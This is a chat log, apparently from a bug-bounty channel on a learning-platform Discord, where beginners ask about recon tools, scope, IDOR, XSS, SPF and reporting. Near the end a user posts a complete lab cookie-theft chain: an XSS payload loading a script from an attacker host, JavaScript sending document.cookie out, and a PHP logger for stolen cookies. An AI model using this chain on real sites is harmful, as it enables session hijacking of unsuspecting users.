Hello everyone, I have scanned a target with subdomain tools like amass and fidomains .... I got a big list of subdomains, then I filtered the subdomain list with the sort command to get unique subdomains.
Now I am trying to get live subdomains with the httprobe tool; however, it's taking a long time to finish ("still running").
I did try httpx but an error shows up saying http:// and https:// are missing.
Any idea how to fix httpx or make httprobe faster?
#bug-bounty
I solved the issue, I just removed it and downloaded it from the GitHub repo.
I think bug bounty is dead once AI takes over code review.
It's just a random thought.
I don't think it will, humans will always make mistakes.
We have automated code review and software testing practices.
It's already here. And not something wishy-washy like AI.
Hello mates, I need help with a JSON CSRF vulnerability in change user profile details that can potentially lead to account takeover; it's been hard coming up with a PoC that works.
When a company puts vulnerabilities out of scope but no vulnerability in scope, does that mean any vulnerability is accepted?
No, anything not listed explicitly as "in-scope" is out of scope.
That's not entirely true.
I think the company would point out "Everything except out of scope is permitted".
If a company says that a vulnerability is out of scope (just as we do) it usually means that those specific bounties are not in scope but everything else is fair game.
It's always great to check with them.
TryHackMe both encourages and rewards responsible security bug discovering and disclosing. Whilst we review every report on a case-by-case basis, we ask fo
Well, this confused me:
https://www.bugcrowd.com/blog/understanding-scope-for-higher-payouts/
There's a quote: "Anything not listed explicitly as "in-scope" is out of scope." But anyway, that doesn't mean it's always true.
As I said, check with the company, but a company isn't going to list every single vulnerability that should be in scope; they're just going to say "xyz is not in scope".
Yeah, makes sense. Thanks.
General question: can anyone point me to a few good resources regarding IDOR? Found a few online, but either the info really doesn't explain much or the concept misses its mark. Been trying to get better at it.
what question do you have about it?
Let me get some resources for you
These seem pretty good
Thank you, some of the materials I've been reviewing seem not to go deep enough for me to get a better grasp on how I can look for opportunities to use IDOR-related bugs. So I've been wracking my brains on how to better approach them from a methodology/process aspect.
Always look for dynamic parameters that are accessing resources.
IDOR is not necessarily limited to incremental IDs.
I think this is where I got hung up on. Thank you very much for the assist
Anyone anticipating OpenAI getting on the bug program soon?
There are rumors that people will be incorporating it.
Alrighty, so far I'm able to make a very basic request to any (?) URI, it seems. Where could I go from here? Could it lead to XSS or something better?
Currently, I've tried ../../logout which doesn't work because it needs an extra step....but ../../join/group basically means that if you visit the profile it'll send a request and join the group. The URL is loaded via an <img src tag....I tried using javascript:xyz but it filters :, it doesn't filter ;
Hmm, it seems it proxies the URL through its own domain first unless you enter the site..so site.com/xyz doesn't get proxied but externalsite.com/xyz gets proxied to site.com/proxy/externalsite.com/xyz/
Hey guys, quick question: if a website doesn't have user sanitization for XSS on a password reset, would that be a bug, as it calls to databases giving the password and storing it and could be used for malicious code?
It's unlikely for passwords since they are most likely hashed when stored in the DB.
That's what I was thinking but in networking you see the password in plain text in the payload section
Of course, you are intercepting the HTTP request.
the password is not echoed back to the website
Wrong thing
The password is given in plain text to other websites before being stored in the DB as a hash.
I'm trying it's just a bit hard
From my understanding, yes, when you type your password it's in text inside the HTML form.
When you also send it, it's not sent as a password hash through the HTTP request.
That's because the hashing should be done server side.
When you're resetting the password using an XSS it is being echoed through the server clients, and when we look where it goes before being stored we find different websites it has been going to in plain text.
How do you know if it's cast to all clients?
This could just me being dumb though
We follow the trail and it sends the HTTP request and the website saves it where we are unable to access it.
But It saves as hash?
No plain text as far as we can see
I seem to not grasp what you're saying
Are you saying you are resetting a password, the password is sent to different websites and then saved?
That's fine I'm a bit hard to understand but I know what I mean
Okay, if I understand it correctly, you reset password -> password sent to different website -> saved in db
It has no user sanitization and can send different payloads like an open redirect, and has the password in plain text being sent across the website, not encoded or hashed.
I think I can do a cookie exfiltration
Hmmm, so when you do a password reset, the password persists within the website
It resided in the website, going to different subdomains.
more than 1?
Even if we entertain this idea, it could be a case of self XSS
How sure are you other users are able to view the malicious password
65% sure other users will be able to view the malicious code
I mean, aren't passwords hidden? So that means nobody can see it?
Do a test with a different account if they're able to view this
If someone can see your password, that's another vuln.
The passwords are hidden until the xss is executed
Most probably, an admin user can view this but that's a different case
I mean, the first goal is if you're able to execute it
If its possible, check if other users can see it
I am able to get the XSS to execute and give me the password after it has been hidden or encoded or hashed, can't remember.
Other users aren't able to see their passwords, so it's probably a self XSS, right?
Yep most likely
An admin user can PROBABLY see it, not sure how the admin panel would work
Yup
I don't know if you should report it or not. I'm new to bb as well
It's a bug for sure, just not sure if they'll triage it.
Yeah ok I'll just email them and see what they think
Yea
Also you need to write a good PoC if i remember correctly, right?
If there's a section about user accounts and their passwords in Admin Panel, then Admins can see it
Otherwise it's stored in the database hashed.
I'm pretty sure I saw other passwords too non hashed
Make sure first
Ok I'll try to replicate
sad
@lilac spindle @shrewd ocean
Yea
There's no report yet as it's new and not disclosed
So I guess now, does anyone want to collab of some sort and try to find bugs on a website of your choice?
Yeah, I haven't found anything yet lmao
But if they fixed it, how come it's still there 👀
I think I'll change my target, the scope is so small
Where you hunting at
are there ways to tell if an application uses nosql?
Wym? I just got told they fixed it so I stopped trying it.
Is it working now?
Last I checked, yeah, it stopped allowing me to reset the user password as an XSS or link or any open redirect, therefore adding sanitization.
rip
Want to try a target and find bugs later
I'd like to but I don't really have a spare time
Ah all good have a good one thanks for your input
How long did it take you all to find your first bug in a bounty program? Just curious..
Hi all
I am completely new to THM.
Can I ask if there is any room for Bug bounty in THM?
Nahamstore is probably one of the rooms closest to bug bounty.
smart one 
I have a webapp related question, am I at the right place ?
shoot
If a developer made sure that all inputs are sanitized completely and that the output is sufficiently encoded, is there any way at all that an XSS could still exist?
Depends on where the sanitization happens.
If it's purely client side, then reflected and/or stored XSS is still on the table.
So the key to COMPLETELY getting rid of XSS is to have server-side sanitization and output encoding?
Both sides should have sanitization.
Also escaping output.
are you saying that if there is sufficient encoding on output there is no way to have XSS at all ?
Thank you
Ah, I didn't see that part
How do you define sufficiently encoded, though?
From what I understand, it's still vulnerable if the sink is being used in a dangerous context.
Believe it or not, this is actually bad practice.
Sanitising on input means you often end up with multiple layers of encoding (e.g. double url / HTML entity encoding, etc), and makes it much more likely that you mangle legitimate user input. For example, in an SQL sanitisation context -- what happens if a user password includes an apostrophe? Perfectly legitimate character to include, but as a worst case scenario you would be silently stripping that out (assuming you sanitised the raw input before hashing) and resulting in the "wrong" password being stored.
Best practice would be to store the data raw (within reason) and sanitise on output.
A lot of templating engines (e.g. React client side, Jinja2 server side) virtually eradicate HTML injection vulns by default, which makes that practice a lot easier to adhere to.
TL;DR: don't try to sanitise stuff with home grown solutions. Chances are your renderer has a better tried-and-tested solution built in.
Seconded. If you have to write your own validators, they belong on the server side where they are much less likely to be messed with. Client side, maybe encrypt with a symmetric key, but really, it's already encrypted in transit if TLS is properly set up.
I get that, what do you mean by within reason?
Like expect what type of input the app should receive?
"Within reason" was just to qualify that I did not mean just store things without validation.
e.g. if an input should only store a whole number, that should still be validated -- not least because it'll throw an error in the DB. Same thing for something like space restrictions on a comments field.
So basically: if a user input meets the logical requirements of the field, then that is what should be stored (unfiltered, but in a safe manner -- e.g. parameterised queries). It should be sanitised on output, which is handled automatically by many templating engines.
Yeah, I get that; many devs I see still stick to using their own type of validation.
Custom validations sure, if needed. Those are often quite niche, so as Juun said, if you gotta write your own validators, just do it and make sure it's server side.
Sanitisation filters, on the other hand, try to use the standard ones. Those are rigorously tested, and if anyone finds a bypass it will be assigned a CVE and fixed quickly.
@worthy folio also the same
Also a reason to use an ORM - writing queries directly in the code is almost always going to end in tears.
True indeed!
ORM good, direct queries bad
What is the vulnerability called when the server issues a 302 redirect but leaks the HTML source code of the requested resource?
I think I've heard it called execute after read
But it's one of those things a lot of people don't seem to think about or notice
Execution after redirect... https://owasp.org/www-community/attacks/Execution_After_Redirect_(EAR)
hey! I'm new here.
Hi New here, I'm Scrubz.
hello
Hi guys, want to ask, is HTTP request smuggling still around being found on bounty? Does learning it give higher chances of finding bugs?
Or does it rarely happen, and should I just focus on the OWASP top 10 if targeting bounty?
OWASP top 10 doesn't really mean anything.
Learn as much as you can, expand your attack vectors, that will give you more chance of finding bugs, if you have more bugs to look for.
So yeah, it's still worth learning.
What are the most common vulnerabilities found in bug bounty in your opinion?
... what are you looking at?
Not to me no but please do a better job at censoring it
You forgot to account for the title bar at the top
And using a red line does not censor the key
The response of a 403 bypass attack on a bug bounty target
Thanks
Will remember next time
I think sparrow is some kind of API.
And its key is leaked.
well, maybe look up surveysparrow
I've been given an assignment to perform the five stages of pen testing on a company on bug bounty and to find a vulnerability/bug.
Any tips on bug hunting / relevant THM rooms to do? Have no clue where to start.
kind of hard
Assignment from whom?
illegal to boot also
on a company on bug bounty?
to do the 5 stages of pentesting?
I haven't seen a BBP allow someone to have persistence.
4th step is usually persistence
Not according to that one, so perhaps they're running off a different list to you.
The person can speak for themselves regarding that
Perhaps, @fallen palm were they specific in what stages they meant
My target from H1: *.example.com
rDNS record from nmap scan: xxx.amazonaws.com
- Can I test that xxx.amazonaws.com site? Aren't they the same?
- I can not find any clear indication in the target's H1 policy.
what are the out of scope targets and attack methods?
No, example.com is not amazonaws.com
If you’re unsure about your contract, email them.
If the website gives me an application error, is that a sign of a bug?
Depends, is it replicable? Is there anything revealed in the error (paths to files, database stuff, code)?
University assignment, not expecting people to help me do it, just more how you guys approach finding bugs on bug bounty websites.
(Reconnaissance (both passive and active), Scanning, Gaining Access, Maintaining Access, and Reporting)
Yep, gaining and maintaining access is not allowed most of the time.
Just stick to a PoC which showcases that the exploit is possible
Kind of like whoami, a DNS lookup, reading /etc/passwd, etc.
alright cool thanks
If you find a Windows Active Directory panel, is that something that should be reported?
Yeah, it's an exposed service that shouldn't be exposed.
What does information disclosure mean in bug bounty?
Website is unknowingly leaking information.
~~Or knowingly and they just couldn't be bothered to fix it~~
But... Does the website know it's leaking? 🤨
I'm always seeing the bug type "Via localStorage/sessionStorage" being found on BugCrowd. And I understand it has to do with a sensitive token being stored in the local storage or session storage of the browser. But at what point does this constitute a bug, and how is it found? I can barely find any information on it online.
For example, there is some value isAdmin set in localStorage/sessionStorage and the front end checks the value from there; if it's false, no access to the admin panel, if it's true, you get access.
It becomes a bug depending on how the data in it is used. In Chromium-based browsers, I think it's shown in the Application tab in DevTools.
I mostly find those by reading through JavaScript files.
@lilac spindle Thanks for the reply. I can see how that would constitute a bug for sure. What about the storing of a sensitive token, i've seen devs advise against that, but that's not inherently a vulnerability right?
It means the token is accessible to JS, like in the case of XSS, but the app's design might require that
Yeah, I've submitted bugs where I've stolen tokens with XSS, but the actual storage of the token doesn't constitute a P4, right? Only, like Mknukn said, where it's some sort of sensitive, changeable value?
I wouldn't wanna submit a vulnerability where I'm like, "hey, you're storing this token in localStorage, that's not good" and they mark it not applicable or P5.
I mean I'd be inclined to agree yeah
for sure, thank you @vocal folio
Unlike cookies, local storage doesn't really feature any access controls except for origin.
true
It's a finding, although possibly not one for bug bounty? 🤷♂️
Ideally the architecture of the backend should accept tokens in a format where they can be handled entirely by the browser (i.e., cookies) rather than requiring JS to be involved with sending them.
That said, for bug bounty you need to demonstrate impact
It's not inherently a vulnerability. If a website is vulnerable to XSS, they have bigger problems than that.
Modern JS frameworks and bearer tokens complicate that one nicely
When you want to use hydra for a brute force attack you have to give it a password.txt, but what is the path, or where can I put my file?
Brute force in a bug bounty?
🤨
It's in a training course to become a pentester.
What do you mean?
I think it's logical.
Brute force is banned in 99% of bug bounty programs.
What do you mean?
What are you trying to brute force?
It's for school training, as I said.
That's not bug bounty related. This channel is for bug bounty.
It's the same thing.
It's absolutely not.
Please go to your teacher or training provider for help with their content.
OK.
Hello everyone.
So I'm trying to find a vulnerability in MySQL 8.0.18, but each one I find mentions "MySQL Server product of Oracle MySQL"; can anyone explain that to me, or whether it would be considered correct? Thanks a lot.
Stored XSS
start
CSRF
A scarab...... Shadow kept it in a tank for about a year before it died.
Wow.
That's.. something.
Probably the wrong kind of bug now.... should have checked the channel name.
Hey y'all, this seems like the most competent BB Discord I've been in, so I figured I'd see if anyone wants to collab. I'd consider myself intermediate. I've got 165 points on Bugcrowd, and I'm good with IDORs, XSS, and OAuth vulnerabilities. Hoping to collab with someone of the same skill level. It doesn't have to be Bugcrowd, it could be HackerOne also.
For gobuster, does anyone know if 1x request = 1x thread? So --threads 300 would mean 300 requests per second?
If not, how would I best limit my requests per second? Like, would it be a combination of --timeout %ms and --threads being lower than the default of 10?
ended up keeping default thread of 10 since it didn't go over the limit of requests per second
Threads are concurrent requests @fallen palm
If you have it on 2 threads, that means you're allowing it to send 2 simultaneous requests.
If you set it to 300 threads, it will allow 300 simultaneous requests, provided that your machine/internet can handle that.
It has nothing to do with seconds.
Alright, cool, thanks.
Hi everybody ☺️
If an XSS payload is showing in the source code, does that mean it's a reflected XSS?
Depends if it's stored or not.
Reflected XSS is non-persistent (not stored on the actual web server itself).
Compare an XSS payload in a search bar vs a comment section.
Both show up in the source code, but only one is stored in the web server or application.
I found this info here on DOM XSS (reflected vs stored), for instance because DOM XSS can appear in the source code.
Here is the link: https://portswigger.net/web-security/cross-site-scripting/dom-based
I have a question, if a domain is in the program scope of a bounty program am I okay to port scan that server?
Hi
alright thanks guys 
true
Hi guys, have some chai.
hi
Where should someone insert XSS payloads? In search bars?
In order for the XSS to be successful, your code needs to be executed.
If it's just reflected in the source code, that may just be intended functionality.
You need to understand how the vulnerability arises, how it pops up in modern-day web applications, and also where you can most likely find them.
You also need to understand how it should be patched so you can give suggestions to them.
Really? I wasn't required to give any suggestions on how to fix it for mine
It's not required
I saw in the 'SQL Injection' room they have a 'Remediation' task at the end. Super useful! Love it.
In case you find a SQL vulnerability.
How do I set up GitLab for debugging? I have started hunting on GitLab, so if anyone can help, please reply.
Hi, how do I start learning about bug bounty?
Hi, check the pinned messages 🙂
I have an in-game crash that I can repeat. Resource exhaustion or unprocessed error handling.
Done!
Do you do this by sending a lot of requests?
What's a false positive?
A false positive is something that has incorrectly set off an alarm or a rule set.
For example:
Someone incorrectly entering their password will set off a "brute force attack" alarm.
thx 
Guys, if I want to put a header, for example X-Forwarded-For:, do I put this anywhere in the request in Burp Suite?
Example of request headers
So I can put it anywhere?
Somewhere between the 2nd line and the 13th line for this example.
hi guys
How do I start bug bounty?
👌👌
Is there a way to have the features from Instagram Android on PC?
I want to see a request in Burp and I don't know how to do it on PC, because the "notes" feature doesn't exist.
Does instagram have a bug bounty program? @patent glacier
Thanks THM (muiri's room specifically), just did my first SQL Injection through Burp
time to apply this on real websites
I've been sleeping on Burp.
Android apps tend to call HTTPS APIs
I.e. Burp works as well on Android as it does on Windows, weirdness with CA cert trust and cert pinning aside.
Yeah, Facebook has a bug bounty program that even includes Instagram.
Hey, anyone trying to configure the reNgine tool?
Can someone tell me what are some good books to read for bug bounty?
Because I'm always spending a lot of time on a website and I can never find anything; if someone can give me some tips, I would really appreciate it.
Sure, check the pinned messages and this:
https://www.bugbountyhunter.com/methodology/zseanos-methodology.pdf
Hi, has anyone tested an application form on a bug bounty program before? I want to test an application form which also asks the applicant to upload a file. But I'm not sure if I should, because I'll be spamming them, I guess... any advice?
Check the scope
Hi guys, I want to get the @zealous radishcrowdninja.com id for a bug bounty. But I don't know how I can get this id.
You just @ someone lol
What's the FQDN for this bug bounty?
What are some good YouTube channels to follow for BugBounty?
I found a potential subdomain takeover, and checking EdOverflow/can-i-take-over-xyz it seems likely to be vulnerable, and nuclei says vulnerable, but the thing is I need to spend $40 to take it over and the program doesn't offer any monetary reward. Is it worth going for it?
Depends, is $40 a lot to you?
Kinda, but I think I could spend it in other ways, such as buying an exam cert or some course for maldev.
OK, and why is the $40 needed for the bug?
To create a custom domain you need to pay $40 on Pantheon.
Do you currently follow any? I personally follow Nahamsec. He has a pretty good bug bounty channel.
And the custom domain is for?
To prove subdomain takeover
Although I'm sure you could speak to them and show that in theory you could take it over
Yeah, I agree
I tried that once but it was rejected.
If they don't listen to you, and don't pay out, don't waste your money on them
Guys, can someone suggest a good alternative to https://anonymousemail.me/
This was earlier free to send spoofed mails, I guess, but now it's paid.
Can anyone suggest a free alternative with the functionality to send mails with a changed sender address?
sendmail
Can you please describe: is it a tool or a site, and how do I use it?
I googled it but I'm still confused.
I mean, I'm trying to figure out what you could possibly need it for...
PoC of missing SPF flag
Eh, fair.
Sendmail is a Linux CLI utility.
For this kinda thing you would probably be better with a python script though
smtplib
Okay, thanks mate.
Np
Hi everyone.
I have been confused for months. I like penetration testing very much, especially system and network penetration testing, but in Egypt, unfortunately, it is very rare to find a freelancing job, so I decided to dedicate myself to being a part-time bug hunter. Any thoughts, please, on a road map for becoming a bug hunter?
Learn web application security from PortSwigger Academy.
Sadly, bug bounty does not include system and network testing; it is just application pentesting (mainly web). I agree with Muknukn: after you finish the academy, I recommend you explore OWASP and their top 10 list.
OK, thanks guys for your help, but am I supposed to be a web application programmer? Because I see a lot of programming code.
It helps a lot.
Can anyone guide me, please, on how I can get practice for bug bounty on platforms like Bugcrowd and HackerOne?
read this 🙂
Hello
I'm writing my first bug bounty report.
And I found a way to unsubscribe everyone from the mailing list.
Under what category does this fall, so I can tell the severity of this vulnerability?
Is it broken access control (BAC) or authentication bypass?
It was a JWT in a URL.
I think BAC is most accurate
Thanks
How do I bypass a login page?
Of?
Learn about the techniques.
SQL injection, XSS, session hijacking, brute forcing, etc.
Just don't go using it on places you shouldn't.
There are companies that have programs so hackers can try something on their products and report it (maybe receiving some money back as well).
ok
take a look at this https://tryhackme.com/path/outline/pentesting
this learning path assumes you have basic cyber security knowledge
status "405"
title "Method Not Allowed"
detail "HTTP method is not allowed"
Is there any way to bypass it?
Where did you see that?
While testing a web app.
I was thinking that's the response you get from trying to access the attackbox but I'm sure that's 504
Nah it's 405
You're using the wrong HTTP verb.
Yeah, I follow him
Do you follow any other bug bounty channels?
I guess you gotta make a report now where you show the bug with the impact included.
Please keep me notified! I'm interested in how your first bug bounty goes. I still have a long way to go myself..
Hey guys
I have a question .... I started my hacking journey years ago just for fun and as a hobby, but a year ago I decided to become a professional bug bounty hunter in web hacking.
I know Linux, learned how to work with a lot of Linux tools.
And learned a lot of networking.
Learned HTML, CSS and JavaScript and still learning about HTML, CSS and JS.
My question is how much
HTML, CSS and JavaScript is needed to start at web hacking bug bounty? Is there anyone that can help with this? Because I really don't want to learn things I don't need as a beginner bug bounty hunter, like Next.js and React.js etc, if I don't need them in the first place.
Anyone who helps me with this, I'll appreciate it a lot.
I think there's a lot to realise about bounty hunting here.
Firstly, it's not a stable income. It's not feasible, nor is it meant to be, to use it as a main job unless you're in a country with a very low cost of living.
Secondly, with practically all hacking it's about how well you understand systems and how they work and fit together. Any learning that you do helps with that goal.
How do you send the message? Do you have like a template?
I totally agree with you ...
To make a living in bug bounty in North America or Europe you have to be very skilled ...
But I live in Syria, and $500 every 2 months is very good here; it might be every week or month, it depends on my time and skills.
no..
What sort of vulnerability is it if I can access other people's documents using a URL which I'm not meant to access?
E.g.: url/1
url/2
What's broken access control? How's it different from IDOR?
@lapis horizon
Thanks ❣️ @lapis horizon
Congrats, and blippy haha nice
Hi guys
Can anyone help me solve this error?
When I type httpx it shows the same error.
But to check whether it is installed correctly or not, I did httpx --help
So all the commands are visible to me.
Help me, someone.
You need to give it a URL.
Piping probably won't work.
It works like httpx https://tesla.com
what's httpx?
"A next generation http client" according to the screenshot about 10 messages up 
- actually.
Can Burp Suite be used with Google (Chrome) or does it have to be Firefox?
You can use it with Google (Chrome).
Just add the FoxyProxy extension and then set the port etc.
ok
There's Burp Browser built in which uses Chromium
^ and that.
wdym?
I just finished setting up Burp Suite, but every time I want to intercept a website it keeps telling me that my connection might not be safe. What should I do?
ohh ok
...
For the sake of everyone whose web applications you're thinking of searching for bugs on, could I suggest that you go and learn a little about how the web actually works before you start flailing around for a big payout..?
Specifically in this case you will want to look into how web requests are secured, TLS, how browsers respond to invalid certificates, etc.
There's no point in trying to hack stuff if you don't understand the fundamentals behind how they work. You're just going to frustrate yourself at best, or unintentionally cause damage to something (and thus cause some poor sap a huge headache) due to lack of comprehension of what you're doing at worst.
Neither of those outcomes are desirable.
I've been starting out in information security for a short time (one month). Do you have a tip for beginners who are learning about the web, for not forgetting what they learned after a while?
For sure 🙂
First up, for "not forgetting what you learned after a while" take lots of notes. Your notebook (regardless of what format you use) is going to be your most valuable possession in this industry. You should never solve a problem or learn about a topic twice -- note down everything in a nice indexable format and you'll go a lot further a lot quicker.
In terms of learning about web stuff, I would honestly recommend setting up a lab, if you can. VMware / VirtualBox with a linux virtual machine inside it. Install Apache2, and learn about how a traditional webserver serves content. Build a simple website with HTML, CSS, raw JavaScript, and PHP. Google whenever you have a question. The MDN docs (Mozilla) are an absolute goldmine of information.
From there learn about some more modern tech stacks -- software defined routing, for example, in NodeJS (Express) webservers, Python Flask / Django, etc. Expand out from there.
Cryptography is a tricky thing to learn to begin with, but once you understand it, you won't have to worry about it changing. It's the same regardless of how the webapp is built. Follow some tutorials for implementing self-signed TLS certificates using OpenSSL on your Apache webserver. Understand what you're looking at. Read about the types of warning you might encounter. One of them (the same one that K hit yesterday) will pop up immediately with a self-signed certificate. Read into what it means and how it can be avoided. Basically aim to have a working understanding of what can go wrong with TLS and what to look out for.
Bonus points if you also set up a VPS (virtual private server) on something like AWS or (the easier and cheaper option) Digital Ocean then use Let's Encrypt (hint: certbot) to request a certificate with a proper chain of trust.
Then mess around with Nginx, or Caddy (or hell, even Apache if you really must) for something like a reverse proxy and/or load balancer in front of a webapp written in Python/Node/Golang/whatever, A) to get a better idea of how things are more likely to work these days, and B) to get experience setting up different webservers so you understand how they work and, again, what's likely to go wrong.
The important thing to remember with any kind of hacking is that all we are ever really doing is applying the same skills as a sysadmin / developer / cloud engineer / whatever in a very specialist way.
"Hacking" as a discipline is just an extreme focus on development and administration from the mindset of trying to test and break things. If you only learn how to attack but never learn how things actually work, then you'll never be more than mediocre. The more you understand about how the systems you're looking at function, the better you will be.
thank you very much, looking forward to trying my best here with your tips, thanks again
Gave +1 Rep to @hybrid orchid
Np 😄
Guys, I have just started exploring bug bounty
I wanted to know why missing SPF records aren't considered a valid bug?
I feel it's an actual vulnerability, as any attacker can spoof and impersonate the company through its email and defame them, which can also affect the reputation (similar to how people bought verified badges on Twitter for fake accounts and destroyed a few companies' stock value)
Reporting this to the company, they don't even recognise it as a bug and say it's intentional 😂
I really wanna know the reason why this vuln is so underrated.
Thanks 😊
Gave +1 Rep to @hybrid orchid

I wonder if you've attached a POC to the report (if that's allowed). Maybe showing them the actual impact it has would make them change their mind?
https://systemweakness.com/email-spoofing-due-to-invalid-spf-record-vulnerability-e53ede4e758e
I found this writeup online that shows how this vulnerability could be leveraged, this person was able to report it on a bug bounty program
Yeah, attached a POC, they're like, it's intentional
Odd, I assume they do have an email server so I don't understand why they say it's intentional. Either way, likely best to move on then if they don't care
Exactly... even I want to know the reason why they are ignoring it
Please, can some pro hunter here shed some light on this
We can't really speak on behalf of the company and their specific reasons
No, i mean it's not just one company... Almost every company has stopped recognising it as a vuln ig
Any particular reason
So let me play devil's advocate for a moment. Why not move on to finding other vulns if SPF isn't something in scope for the companies you are working with? If you look at something like Bugcrowd's Vulnerability Rating Taxonomy, an SPF issue is a P5 at best. It's not a truly impactful vuln considering all the risks to apps and infrastructure that are out there.


Does TryHackMe have a bug bounty program
yes
Is it one of the learning paths
Responsibly discovering & disclosing security flaws!
Yeah, was wondering if there was a learning path like the Jr Pentester
oh you wanna learn how to do bug bounty??? would point you towards #web-fundamentals-path then as that explains the majority of bug bounties people get on the web
ok cool thanks
Gave +1 Rep to @little meteor
no problem
One more question I am almost done with the Jr. Penetration Tester program would doing the Comptia Pentest+ help me in becoming a Pentester
yes, but you will have the majority of that path already done after Junior Pentester... still, it will help you get said cert by giving you some of the knowledge you would need while doing said certification
Think I will do that one too never hurts thanks
You should also read the pinned message in this channel, has some really good suggestions for what you should do, which is appropriate at all levels, but I believe after you finish Jr. Penetration Tester path and Web Fundamentals path is the best time to start using the resources mentioned in the pinned message.
thank you
Gave +1 Rep to @shadow matrix
No you cannot hack any wordpress site
@worthy folio , the person also posted on multiple channels of the same question
@analog glen
What are you trying to do with the wordpress? which site?
account made same day it joined this discord
asks about how to hack WordPress... hmmmmm
Rule of thumb is, if you don't have a written and formalized contract to test a site, don't touch it. If you can, lab it up at home.
Carefully read all your TOS, EULA, and other agreements with your cloud provider before doing anything.
@analog glen , @worthy folio
So one won't be able to find bugs on WordPress-based sites? And it's a waste of time attempting to do the same?
I never said that
Do due diligence whenever doing a security test. Legalities, scope, awareness, etc. should be followed
Adding x-hackerone header in burp: Proxy -> Options -> Match & Replace
hello everyone, I would like to ask about threat hunting
currently I am trying to do an external threat hunts, where I don't have any access to the target environments.
I would like to know, how can I find any kind of leaked information for instance, gitlab projects.
do you guys have any suggestions on how to start, what to know to help me through this process?
thank you 🙂 (I am a beginner)
saving this for later 
Hey guys, I already asked the question in general but got no answer:
Does McDonald's have a security email, where you can report a bug?
or do they have a bug bounty
I'm sure this is very easy to search on Google.
I did, found nothing. So I asked here in case someone does know by chance
Doesn't seem to have one
So I wouldn't do any poking around
@lavish hollow
@paper ridge This is not a place to self promote
Sorry where can I share ?
Not here, you need to interact with the community before promoting your content
if a download link for some user's private file on a website can be used by anyone without authentication, is that a valid bug
I think it depends on what user, and is it for all users or only one?
if it's only one user then it's there for a purpose
Like, for example, some photo editing website: when I download the photo that I edited and intercept the request, the link that I get can be used by anyone to download it without logging in
well, from what I understand, in this case it's not good for customers' / clients' privacy.
Although it doesn't damage the website or make it vuln
But if the enterprise really cares about being successful then protecting customers' privacy is a must
I'm not confident with what I say so I recommend you ask more knowledgeable people
Is the link random and rate limited? If it is then I wouldn't say it is a vuln
anyone interested in collab??
Plz do report it
Getting access to private files is not normal behaviour
Yes, but you're intercepting the request? The only way to do it is for you (the user) to manually get the link and send it
It's like doing Self-XSS
How else would you be able to download the image 😆
If the link is unguessable, and proper rate limiting exists, then practically no access is given
How to get into advanced bug bounty?
I have completed one course from ZTM and am doing TryHackMe currently.
But I still don't have a clear picture about bug bounty or how one finds bugs
Any recommendations?
Bug bounty is basically just web penetration testing. The OWASP Foundation and the PortSwigger Academy have great stuff about web PT, and OWASP even has a methodology you can learn, which I think is what you are talking about.
Hi everyone, I'm totally new to bounty hunting! Finished a Jr Pentest course on THM not long ago.
Just wondering what recommendations you might have for a bounty hunting environment? Did you use your existing computer, run an environment in a VM, get a separate device, etc...
I'm thinking of running a VM with Kali Linux to start off.
yes, Kali VM sounds good
I just used my existing computer
What environment are you working with on your existing computer?
My existing computer is windows 10. You didn't use a VM or any other environment to do testing?
what's the point of setting up a bug bounty program if you are gonna have Cloudflare protection on your site, it bugs me so much, unless there's a bypass that I'm not aware of
wat
"checking if your connection is secure" 🤓 and then getting stuck in a loading screen for an infinite time 😂
Cloudflare is mostly there to protect against botnets & ddos type attacks
It's not going to save you from a logical error on your site
Are you using the burp browser?
Have you tried loading onto the site
Then turning on your proxy
That's what fixes it for me
yes for some reason it doesn't like the traffic being proxied
But if you load into the site normally, (which then gives you the cf cookie), it should stop complaining
yeah makes sense
doesn't Burp Suite have an option to import cookies?
or would that not make a difference
We can't help you with CTFs, sorry.
@fringe wadi Please do not ask for help with active CTFs
Specify the item in the keychain
I want to do a test scan on openvas but I couldn't find where to do it. Could you help?
Does Acunetix allow this?
Seems fair, is this the IP for that website?
I hope 🙂
I was being facetious
Anyone has heroku paid account?
Why?
guys, can anyone help me regarding this https://www.leavesongs.com/PENETRATION/the-collision-of-containers-and-the-cloud-pentesting-a-MinIO-EN.html? I have found the same, but at domain level, and I am stuck at the "0x04 Attack Docker API" section from this blog, as I have found a vulnerability at domain level, not on the Docker API
phith0n's little site, long-standing, sharing original articles about network security and all kinds of programming.
it's a MinIO console of the site
for example this https://minio.nopapersolution.com/
MinIO Console
What bug bounty program has this in scope?
Yeah, they have, if I am able to successfully gain access to it
That's not how scope works
I did some research, you are right, I was trying to exploit it. But leave it, I got to know something new
that would go in #room-bugs... this channel is mostly for the action of doing bug bounty on other sites and discussions about that and sharing learning material...
anyways this is probably a known bug and hard to fix as the shodan website and scans are always updating so hence there are pictures in the room to refer to
Hi ! Can anyone suggest which THM rooms i would complete to get the introduction for bugbounty ? Thanks in advance!
The Web Fundamentals path is good
Hi Guys
Is there any alternative for Kali bare-metal, because I can't find it on the website
Why Bare-metal?
so today I learnt
in javascript, if ', ' or " are blocked you can use /test/.source to craft a string!
super neat
is that in like general or for a specific thing?
just in general
Nice
and fwiw, I just got a bounty abusing this :O
I am doing the XSS skills assessment on Hack The Box but can't find anyone to help, so I've come here. Anyone willing to drop a hint?
Why don't you ask their discord server?
Seems a bit of a stretch though asking on the THM discord don't you think?
Have you tried looking online for hints, in the form of writeups or something?
yep, there aren't many writeups so I'm currently asking ChatGPT
thanks, ChatGPT said it's an issue with my script.js file so I'll try that fix first, if not take a look at this
Gave +1 Rep to @paper ridge
their forums are a great help
already checked, I think it's an issue with the site or I'm missing something, because in the last session hijacking section I had no issues; in this one I am not receiving the cookie
probs an error on your payload
XSS payload - javascript:eval('var a=document.createElement('script');a.src='http://OUR_IP';document.body.appendChild(a)')
script.js - new Image().src='http://OUR_IP/index.php?c='+document.cookie; or document.location='http://OUR_IP/index.php?c='+document.cookie;
index.php - <?php
if (isset($_GET['c'])) {
$list = explode(";", $_GET['c']);
foreach ($list as $key => $value) {
$cookie = urldecode($value);
$file = fopen("cookies.txt", "a+");
fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
fclose($file);
}
}
?>
both index.php and script.js are stored in /tmp/tmpserver
I did test this payload using netcat and did receive a response
but when I use PHP this is what's returned - sudo php -S 0.0.0.0:8080 -t /tmp/tmpserver
[sudo] password for r3tr0:
[Fri Apr 28 10:43:45 2023] PHP 7.4.30 Development Server (http://0.0.0.0:8080) started
[Fri Apr 28 10:44:41 2023] 10.129.19.250:46118 Accepted
